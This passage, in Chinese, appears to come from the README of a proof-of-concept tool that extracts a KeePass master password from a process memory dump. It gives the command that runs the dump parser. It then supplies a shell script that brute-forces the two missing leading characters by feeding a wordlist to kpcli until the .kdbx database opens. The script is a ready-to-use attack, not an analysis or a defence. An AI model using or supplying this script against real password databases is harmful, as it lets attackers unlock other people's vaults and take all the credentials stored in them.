python3 poc.py <PathToDmp>

提醒一下,转储中找不到第一个字符,而对于第二个字符,脚本只会给出几种可能性。无论如何,我们建议您使用下面的脚本对2个字符进行暴力破解:
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
echo "Using password: \"$i\""
echo "$i" | kpcli --kdb=$1 && exit 0
done < $2
此脚本在物理机上运行良好,但在虚拟机上似乎不稳定
顺便说一句:本项目中的 python 脚本遵循以下项目的读取方式:https://github.com/vdohney/keepass-password-dumper